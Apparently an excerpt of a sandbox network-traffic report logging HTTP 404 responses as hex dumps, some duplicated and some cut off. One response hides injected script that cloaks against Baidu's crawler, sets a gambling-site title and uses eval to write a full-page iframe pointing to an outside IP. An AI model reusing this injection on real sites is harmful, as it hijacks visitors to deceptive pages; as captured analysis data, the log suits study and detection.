      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Nov 2022 18:21:32 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Nov 2022 18:21:34 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Nov 2022 18:21:39 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"634bbb43-6cd"Content-Encoding: gzipData Raw: 33 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 15 cb 6e dc 36 f0 9e af 60 59 d4 92 60 9b 92 d6 bb 89 bb 92 16 88 d3 06 08 10 b8 3d a4 a7 20 07 4a e2 4a 74 b8 a4 40 72 1f f2 62 bf a2 87 fe 42 cf 0d d0 63 3f 27 40 fe a2 43 49 eb 95 0d e7 a0 11 e7 3d c3 79 30 ad ed 4a 2c 5e a4 35 a3 e5 22 5d 31 4b 51 51 53 6d 98 cd f0 1f 1f de 5e 5e e3 70 91 5a 6e 05 5b 4c a3 29 ba 55 16 bd 55 6b 59 a6 61 4f 4c 4d a1 79 63 17 7c e9 4b ba e1 15 b5 4a 93 b5 61 fa 75 c5 a4 25 56 bd 57 05 15 ec bd da 32 fd 86 1a e6 07 84 cb 92 ed 7e 5b fa 38 a7 bc 5c e3 00 65 19 ba 8c 83 7d a9 8a f5 aa 53 72 ee 50 86 bf fe f7 e5 db 5f 7f 7f fb f3 df af ff 7c c1 87 34 1c 5c a5 82 cb cf 48 33 91 61 5e 28 89 91 6d 1b 06 e7 15 ad 58 b8 bb ec 69 b5 66 cb 0c d7 d6 36 f3 30 9c ce 48 3c 99 90 f8 ea 9a 4c 67 e1 12 e2 04 3d 02 00 2f 8e f1 3f 38 df 6a 6e 99 90 be e7 05 c9 86 6a 64 4c e6 a5 25 df 20 5e 66 d8 d4 6a 5b 08 25 99 a9 99 ac 76 9c 3a f7 c6 b6 02 fc d7 8c 57 b5 9d a3 38 8a 7e 4a d0 96 97 b6 3e 22 39 2d 3e 57 da 5d db 65 a1 84 d2 73 a4 ab dc 9f cc 66 17 e8 08 82 04 8d a4 1a 65 b8 e5 4a ce 11 97 70 a0 e2 f8 7f 24 a5 59 c3 28 78 7c 2a 03 59 f1 a5 a6 2b 86 e0 c6 94 80 eb aa 32 dc 32 83 d1 8a ea 8a cb 3e d2 2c 1a d0 2e 54 c0 50 a7 93 2b 5d 32 9d e1 08 f7 39 64 d8 25 74 42 a6 11 70 06 0b 03 cb e8 22 c3 67 3f c6 d1 34 01 18 bf 1c c1 09 9c 67 d7 00 a6 af 8e 60 d6 d1 ae 1c ea 24 a7 3f 3b 34 3a 82 11 2d 76 b4 4e c4 81 91 da ab 04 32 0c fb 14 e1 00 c5 81 32 ba 22 0c 9d 60 d9 ce 86 85 31 78 e1 9a 7b df 97 a2 2b cb 50 23 77 3e e4 aa 6c d1 77 98 89 da 30 bd 14 6a 3b af 79 59 32 e9 9a cf 39 58 78 09 db 50 e1 e3 c7 ed e2 7b f8 dc 98 73 0c 2d 83 83 c4 ea 76 0f f3 f3 4e 5a a6 9d f0 72 2d 0b 57 4c 3f d8 3b d6 83 6a c5 ec af 82 b9 8e bf 69 df 95 60 93 6f 5e 0b 81 03 d2 b9 22 25 37 8d a0 6d 86 25 f4 1b 3e 14 d4 16 b5 cf 82 fd 61 a9 b4 ef 3a 93 67 51 c2 d3 07 73 2e 1f 52 d4 5c 94 9a 49 22 a0 3f 6d 9d f0 f3 f3 de ab 53 b0 b4 92 50 e1 ec 79 95 8f fc 13 01 89 5b 90 e8 1a 7f d5 42 c7 7f 5f 94 97 09 cc bc 13 fa a1 9f c3 5f f8 26 c6 67 67 03 e5 b9 49 19 8d f8 a3 60 9d e7 67 73 1e 25 7d 38 5c 40 d5 82 11 e5 b4 0f 86 bd 30 be 68 97 40 de 9c c2 2f 34 4c 0a 1b ae db f7 7a 8d 61 c2 8b b5 fe 5d 2b ab 60 34 b3 2d 2c 27 b5 25 02 96 96 2b 19 69 06 06 81 5a 70 eb 7b 73 2f f8 18 7d 72 99 8f b5 b2 cc 73 9b c6 78 c1 3e 6f 88 1b 87 1e 87 d5 73 7f 4f f2 d2 58 b0 56 90 42 ad 42 b7 bb cc 3a 5f 71 1b 36 6b 53 93 3b e3 25 07 26 0c 7b a4 09 8a 1d f7 be a6 d2 7d 15 e9 76 65 67 e1 a4 d6 ad a7 53 8e a7 7e 32 37 ed 87 be 92 3e ee 53 c5 5d d8 86 34 14 9a c3 de aa 92 c1 1a 86 2d 6d 6f 18 b4 13 f3 f3 e6 c2 04 c9 21 f0 83 e4 e9 bd 8e 87 ea 8e 6e e8 60 10 75 53 df a5 0d d1 de 99 6e e9 1b 32 8b 89 a0 e1 24 9e be 8c 67 57 31 a4 e7 46 f5 b8 b8 c3 ee 95 79 91 ba ea c3 af 80 50 98 5e a4 75 fc f4 6d 01 4a 1a 0e 6c 78 9b 40 66
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Nov 2022 18:21:42 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"634bbb43-6cd"Content-Encoding: gzipData Raw: 33 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 15 cb 6e dc 36 f0 9e af 60 59 d4 92 60 9b 92 d6 bb 89 bb 92 16 88 d3 06 08 10 b8 3d a4 a7 20 07 4a e2 4a 74 b8 a4 40 72 1f f2 62 bf a2 87 fe 42 cf 0d d0 63 3f 27 40 fe a2 43 49 eb 95 0d e7 a0 11 e7 3d c3 79 30 ad ed 4a 2c 5e a4 35 a3 e5 22 5d 31 4b 51 51 53 6d 98 cd f0 1f 1f de 5e 5e e3 70 91 5a 6e 05 5b 4c a3 29 ba 55 16 bd 55 6b 59 a6 61 4f 4c 4d a1 79 63 17 7c e9 4b ba e1 15 b5 4a 93 b5 61 fa 75 c5 a4 25 56 bd 57 05 15 ec bd da 32 fd 86 1a e6 07 84 cb 92 ed 7e 5b fa 38 a7 bc 5c e3 00 65 19 ba 8c 83 7d a9 8a f5 aa 53 72 ee 50 86 bf fe f7 e5 db 5f 7f 7f fb f3 df af ff 7c c1 87 34 1c 5c a5 82 cb cf 48 33 91 61 5e 28 89 91 6d 1b 06 e7 15 ad 58 b8 bb ec 69 b5 66 cb 0c d7 d6 36 f3 30 9c ce 48 3c 99 90 f8 ea 9a 4c 67 e1 12 e2 04 3d 02 00 2f 8e f1 3f 38 df 6a 6e 99 90 be e7 05 c9 86 6a 64 4c e6 a5 25 df 20 5e 66 d8 d4 6a 5b 08 25 99 a9 99 ac 76 9c 3a f7 c6 b6 02 fc d7 8c 57 b5 9d a3 38 8a 7e 4a d0 96 97 b6 3e 22 39 2d 3e 57 da 5d db 65 a1 84 d2 73 a4 ab dc 9f cc 66 17 e8 08 82 04 8d a4 1a 65 b8 e5 4a ce 11 97 70 a0 e2 f8 7f 24 a5 59 c3 28 78 7c 2a 03 59 f1 a5 a6 2b 86 e0 c6 94 80 eb aa 32 dc 32 83 d1 8a ea 8a cb 3e d2 2c 1a d0 2e 54 c0 50 a7 93 2b 5d 32 9d e1 08 f7 39 64 d8 25 74 42 a6 11 70 06 0b 03 cb e8 22 c3 67 3f c6 d1 34 01 18 bf 1c c1 09 9c 67 d7 00 a6 af 8e 60 d6 d1 ae 1c ea 24 a7 3f 3b 34 3a 82 11 2d 76 b4 4e c4 81 91 da ab 04 32 0c fb 14 e1 00 c5 81 32 ba 22 0c 9d 60 d9 ce 86 85 31 78 e1 9a 7b df 97 a2 2b cb 50 23 77 3e e4 aa 6c d1 77 98 89 da 30 bd 14 6a 3b af 79 59 32 e9 9a cf 39 58 78 09 db 50 e1 e3 c7 ed e2 7b f8 dc 98 73 0c 2d 83 83 c4 ea 76 0f f3 f3 4e 5a a6 9d f0 72 2d 0b 57 4c 3f d8 3b d6 83 6a c5 ec af 82 b9 8e bf 69 df 95 60 93 6f 5e 0b 81 03 d2 b9 22 25 37 8d a0 6d 86 25 f4 1b 3e 14 d4 16 b5 cf 82 fd 61 a9 b4 ef 3a 93 67 51 c2 d3 07 73 2e 1f 52 d4 5c 94 9a 49 22 a0 3f 6d 9d f0 f3 f3 de ab 53 b0 b4 92 50 e1 ec 79 95 8f fc 13 01 89 5b 90 e8 1a 7f d5 42 c7 7f 5f 94 97 09 cc bc 13 fa a1 9f c3 5f f8 26 c6 67 67 03 e5 b9 49 19 8d f8 a3 60 9d e7 67 73 1e 25 7d 38 5c 40 d5 82 11 e5 b4 0f 86 bd 30 be 68 97 40 de 9c c2 2f 34 4c 0a 1b ae db f7 7a 8d 61 c2 8b b5 fe 5d 2b ab 60 34 b3 2d 2c 27 b5 25 02 96 96 2b 19 69 06 06 81 5a 70 eb 7b 73 2f f8 18 7d 72 99 8f b5 b2 cc 73 9b c6 78 c1 3e 6f 88 1b 87 1e 87 d5 73 7f 4f f2 d2 58 b0 56 90 42 ad 42 b7 bb cc 3a 5f 71 1b 36 6b 53 93 3b e3 25 07 26 0c 7b a4 09 8a 1d f7 be a6 d2 7d 15 e9 76 65 67 e1 a4 d6 ad a7 53 8e a7 7e 32 37 ed 87 be 92 3e ee 53 c5 5d d8 86 34 14 9a c3 de aa 92 c1 1a 86 2d 6d 6f 18 b4 13 f3 f3 e6 c2 04 c9 21 f0 83 e4 e9 bd 8e 87 ea 8e 6e e8 60 10 75 53 df a5 0d d1 de 99 6e e9 1b 32 8b 89 a0 e1 24 9e be 8c 67 57 31 a4 e7 46 f5 b8 b8 c3 ee 95 79 91 ba ea c3 af 80 50 98 5e a4 75 fc f4 6d 01 4a 1a 0e 6c 78 9b 40 66
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Nov 2022 18:21:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"634bbb43-6cd"Content-Encoding: gzipData Raw: 33 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 15 cb 6e dc 36 f0 9e af 60 59 d4 92 60 9b 92 d6 bb 89 bb 92 16 88 d3 06 08 10 b8 3d a4 a7 20 07 4a e2 4a 74 b8 a4 40 72 1f f2 62 bf a2 87 fe 42 cf 0d d0 63 3f 27 40 fe a2 43 49 eb 95 0d e7 a0 11 e7 3d c3 79 30 ad ed 4a 2c 5e a4 35 a3 e5 22 5d 31 4b 51 51 53 6d 98 cd f0 1f 1f de 5e 5e e3 70 91 5a 6e 05 5b 4c a3 29 ba 55 16 bd 55 6b 59 a6 61 4f 4c 4d a1 79 63 17 7c e9 4b ba e1 15 b5 4a 93 b5 61 fa 75 c5 a4 25 56 bd 57 05 15 ec bd da 32 fd 86 1a e6 07 84 cb 92 ed 7e 5b fa 38 a7 bc 5c e3 00 65 19 ba 8c 83 7d a9 8a f5 aa 53 72 ee 50 86 bf fe f7 e5 db 5f 7f 7f fb f3 df af ff 7c c1 87 34 1c 5c a5 82 cb cf 48 33 91 61 5e 28 89 91 6d 1b 06 e7 15 ad 58 b8 bb ec 69 b5 66 cb 0c d7 d6 36 f3 30 9c ce 48 3c 99 90 f8 ea 9a 4c 67 e1 12 e2 04 3d 02 00 2f 8e f1 3f 38 df 6a 6e 99 90 be e7 05 c9 86 6a 64 4c e6 a5 25 df 20 5e 66 d8 d4 6a 5b 08 25 99 a9 99 ac 76 9c 3a f7 c6 b6 02 fc d7 8c 57 b5 9d a3 38 8a 7e 4a d0 96 97 b6 3e 22 39 2d 3e 57 da 5d db 65 a1 84 d2 73 a4 ab dc 9f cc 66 17 e8 08 82 04 8d a4 1a 65 b8 e5 4a ce 11 97 70 a0 e2 f8 7f 24 a5 59 c3 28 78 7c 2a 03 59 f1 a5 a6 2b 86 e0 c6 94 80 eb aa 32 dc 32 83 d1 8a ea 8a cb 3e d2 2c 1a d0 2e 54 c0 50 a7 93 2b 5d 32 9d e1 08 f7 39 64 d8 25 74 42 a6 11 70 06 0b 03 cb e8 22 c3 67 3f c6 d1 34 01 18 bf 1c c1 09 9c 67 d7 00 a6 af 8e 60 d6 d1 ae 1c ea 24 a7 3f 3b 34 3a 82 11 2d 76 b4 4e c4 81 91 da ab 04 32 0c fb 14 e1 00 c5 81 32 ba 22 0c 9d 60 d9 ce 86 85 31 78 e1 9a 7b df 97 a2 2b cb 50 23 77 3e e4 aa 6c d1 77 98 89 da 30 bd 14 6a 3b af 79 59 32 e9 9a cf 39 58 78 09 db 50 e1 e3 c7 ed e2 7b f8 dc 98 73 0c 2d 83 83 c4 ea 76 0f f3 f3 4e 5a a6 9d f0 72 2d 0b 57 4c 3f d8 3b d6 83 6a c5 ec af 82 b9 8e bf 69 df 95 60 93 6f 5e 0b 81 03 d2 b9 22 25 37 8d a0 6d 86 25 f4 1b 3e 14 d4 16 b5 cf 82 fd 61 a9 b4 ef 3a 93 67 51 c2 d3 07 73 2e 1f 52 d4 5c 94 9a 49 22 a0 3f 6d 9d f0 f3 f3 de ab 53 b0 b4 92 50 e1 ec 79 95 8f fc 13 01 89 5b 90 e8 1a 7f d5 42 c7 7f 5f 94 97 09 cc bc 13 fa a1 9f c3 5f f8 26 c6 67 67 03 e5 b9 49 19 8d f8 a3 60 9d e7 67 73 1e 25 7d 38 5c 40 d5 82 11 e5 b4 0f 86 bd 30 be 68 97 40 de 9c c2 2f 34 4c 0a 1b ae db f7 7a 8d 61 c2 8b b5 fe 5d 2b ab 60 34 b3 2d 2c 27 b5 25 02 96 96 2b 19 69 06 06 81 5a 70 eb 7b 73 2f f8 18 7d 72 99 8f b5 b2 cc 73 9b c6 78 c1 3e 6f 88 1b 87 1e 87 d5 73 7f 4f f2 d2 58 b0 56 90 42 ad 42 b7 bb cc 3a 5f 71 1b 36 6b 53 93 3b e3 25 07 26 0c 7b a4 09 8a 1d f7 be a6 d2 7d 15 e9 76 65 67 e1 a4 d6 ad a7 53 8e a7 7e 32 37 ed 87 be 92 3e ee 53 c5 5d d8 86 34 14 9a c3 de aa 92 c1 1a 86 2d 6d 6f 18 b4 13 f3 f3 e6 c2 04 c9 21 f0 83 e4 e9 bd 8e 87 ea 8e 6e e8 60 10 75 53 df a5 0d d1 de 99 6e e9 1b 32 8b 89 a0 e1 24 9e be 8c 67 57 31 a4 e7 46 f5 b8 b8 c3 ee 95 79 91 ba ea c3 af 80 50 98 5e a4 75 fc f4 6d 01 4a 1a 0e 6c 78 9b 40 66
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Nov 2022 18:21:46 GMTContent-Type: text/htmlContent-Length: 1741Connection: closeVary: Accept-EncodingETag: "634bbb43-6cd"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 3e 69 66 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 63 61 6c 65 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 22 62 61 69 64 75 22 29 20 3d 3d 20 2d 31 29 7b 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 20 3d 22 e6 be b3 e9 97 a8 e9 93 b6 e6 b2 b3 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 34 35 2e 31 32 32 2e 31 33 38 2e 34 35 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 6c 6e 28 27 27 29 3b 76 61 72 20 73 73 3d 27 3c 64 69 76 20 69 64 3d 22 73 68 6f 77 63 6c 6f 6e 65 73 68 65 6e 67 78 69 61 6f 6e 22 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 29 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 69 6e 69 74 69 61 6c 20 69 6e 69 74 69 61 6c 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 69 6e 69 74 69 61 6c 20 69 6e 69 74 69 61 6c 3b 22 3e 3c 69 66 72 61 6d 65 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 79 65 73 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 30 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 30 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 77 69 64 74 68 3d 22 31 34 30 30 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 73 72 63 3d 22 26 23 31 30 34 3b 26 23 31 31 36 3b 26 23 31 31 36 3b 26 23 31 31 32 3b 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 35 32 3b 26 23 35 33 3b 26 23 34 36 3b 26 23 34 39 3b 26 23 35 30 3b 26 23 35 30 3b 26 23 34 36 3b 26 23 34 39 3b 26 23 35 31 3b 26 23 35 36 3b 26 23 34 36 3b 26 23 35 32 3b 26 23 35 33 3b 26 23 34 37 3b 22 3e 3c 2f 69 66 72 61 6d 65 3e 3c 2f 64 69 76 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 68 74 6d 6c 7b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 20 7b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 3c 2f 73 74 79 6c 65 3e 27 3b 65 76 61 6c 28 22 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 22 2b 73 73 2b 22 27 29 3b 22 29 3b 74 72 79 7b 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 64 69 76 41 6c 6c 22 29 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 6e 6f 6e 6
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Nov 2022 18:22:00 GMTServer: ApacheContent-Length: 570Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Nov 2022 18:22:02 GMTServer: ApacheContent-Length: 570Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Nov 2022 18:22:04 GMTServer: ApacheContent-Length: 570Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 